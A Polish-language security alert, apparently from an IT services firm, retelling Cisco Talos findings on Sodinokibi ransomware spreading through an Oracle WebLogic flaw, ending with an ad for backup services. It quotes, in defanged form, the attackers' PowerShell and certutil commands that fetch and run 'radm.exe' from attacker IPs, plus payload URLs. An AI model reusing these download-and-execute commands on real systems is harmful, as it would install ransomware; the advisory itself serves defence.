[ALERT] Ransomware „Sodinokibi” wykorzystuje lukę w serwerach bazodanowych
[ALERT] Ransomware „Sodinokibi” wykorzystuje lukę w serwerach bazodanowych
Ransomware – szkodliwe oprogramowanie aktywnie wykorzystują ujawnioną niedawno lukę w zabezpieczeniach serwerów bazodanowych aplikacji, aby zainstalować nowy wariant oprogramowania ransomware o nazwie „Sodinokibi”.
„Sodinokibi” próbuje zaszyfrować dane w katalogu użytkownika i usunąć kopie zapasowe, aby utrudnić odzyskiwanie danych. Luka ta jest łatwa do wykorzystania przez atakujących, ponieważ każdy, kto ma dostęp HTTP do serwera bazodanowego, może przeprowadzić atak. Atakujący wykorzystują ten exploit od co najmniej 17 kwietnia . Zespół Cisco Incident Response (IR) wraz z Cisco Talos aktywnie weryfikują tego rodzaju ataki. Użytkownik widzi komunikat jak niżej:
![[ALERT] Ransomware](https://www.csk.com.pl/wp-content/uploads/2019/07/ransom1-771x1024.jpg)
Pierwsze etapy ataku ransomware miały miejsce 25 kwietnia, dzień przed opublikowaniem przez Oracle aktualizacji. Była to próba sprawdzenia, czy serwer jest podatny na atak.
![[ALERT] Ransomware](https://www.csk.com.pl/wp-content/uploads/2019/07/ransom2.png)
26 kwietnia 2019 r. Atakujący nawiązali połączenie HTTP z innym podatnym serwerem, żądając usługi AsyncResponderService serwera Oracle WebLogic.
![[ALERT] Ransomware](https://www.csk.com.pl/wp-content/uploads/2019/07/ransom3-1024x762.jpg)
Historycznie większość odmian oprogramowania ransomware wymagała pewnej formy interakcji z użytkownikiem, takiej jak otwarcie przez użytkownika załącznik do wiadomości e-mail.
W tym przypadku napastnicy wykorzystali lukę w kodzie, inicjując pobranie przez serwer, którego dotyczy problem, kopii oprogramowania ransomware z adresów IP kontrolowanych przez atakującego 188.166.74 [.] 218 i 45.55.211 [.] 79.
Ataki pochodziły z adresu 130.61.54 [.] 136. Żądanie HTTP POST zawierało argumenty do instrukcji cmd.exe – komendy PowerShell do pobrania pliku o nazwie „radm.exe” z hosta 188.166.74 [.] 218, a następnie plik był zapisywany lokalnie i zaczynał się wykonywać.
cmd / c powershell.exe wget http [:] // 188.166,74 [.] 218 / radm.exe -outfile% TEMP% / radm.exe & cmd.exe / c% TEMP%
Oprócz PowerShell zaobserwowaliśmy również, że atakujący kreatywnie przekazali narzędzie certutil do cmd, aby pobrać plik:
cmd / c cmd.exe / c certutil.exe -urlcache -split -f http [:] // 188.166,74 [.] 218 / radm.exe% TEMP% / radm.exe & cmd.exe / c% TEMP% radm.exe
Oprócz „radm.exe” mogą pojawić się pliki pod inną nazwą:
hxxp [:] // 188.166,74 [.] 218 / office.exe
hxxp [:] // 188.166.74 [.] 218 / radm.exe
hxxp [:] // 188.166.74 [.] 218 / bez tytułu. exe
hxxp [:] // 45.55.211 [.] 79 / .cache / untitled.exe
Poniżej znajduje się schemat złośliwego pliku „untitled.exe” wykorzystujący „cmd.exe” do wykonania narzędzia vssadmin.exe. Ta akcja jest powszechną taktyką oprogramowania ransomware, aby uniemożliwić użytkownikom łatwe odzyskiwanie danych. Próbuje usunąć domyślne mechanizmy tworzenia kopii zapasowych systemu Windows, zwane inaczej „kopiami w tle”, aby zapobiec odzyskiwaniu oryginalnych plików z tych kopii zapasowych.
![[ALERT] Ransomware](https://www.csk.com.pl/wp-content/uploads/2019/07/ransom5-979x1024.png)
![[ALERT] Ransomware](https://www.csk.com.pl/wp-content/uploads/2019/07/ransom7.jpg)
Źródło: blog.talosintelligence.com
CSK w ramach swoich usług zapewnia proaktywny monitoring usług, w tym działania serwerów. Stale nadzorujemy działanie aplikacji, co pozwala na szybką reakcję w momencie wykrycia niepożądanego działania. Oferujemy swoim klientom usługę MOB czyli backup w chmurze, co pozwala w bezpieczny sposób przywrócić poprawne działanie systemu. Należy jednak pamiętać, że żadne rozwiązanie nie daje 100% pewności bezpieczeństwa danych. W przypadku pytań zapraszamy do kontaktu.
